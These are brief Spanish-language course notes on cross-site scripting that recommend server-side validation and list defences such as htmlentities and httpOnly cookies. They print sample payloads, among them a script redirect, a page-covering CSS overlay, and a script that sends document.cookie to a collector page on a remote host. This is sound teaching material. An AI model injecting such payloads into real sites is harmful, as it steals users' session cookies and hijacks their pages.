Lo más importante en seguridad web es validarlo todo y dejar siempre la seguridad en el lado del servidor y nunca del cliente.
Hay que validar la entrada desde formularios, lo que viene en la url, etc
Técnicas que permiten obtener información que otra web ha dejado en minavegador, por ejemplo: cookies.
Esto se consigue inyectando código en la aplicación web del otro dominio: html, css, javascript.
Insertando código javascript
<script language='javascript'>location.href='http://www.us.es';</script>
Insertando css
<div style="position:absolute;top:0px;left:0px;z-order=5000;background-color:red;color:white;width:100%;height:100%;">XSS</div>
Leyendo cookies
<script language='javascript'>location.href='
http://10.1.25.52/~palako/forpas/cookie.php?c=' + document.cookie;</script>
Para evitar todo esto
1. Usamos htmlentities
2. En ASP.net también podemos usar la bandera httpOnly en la cookie
Atención a la opción TRACE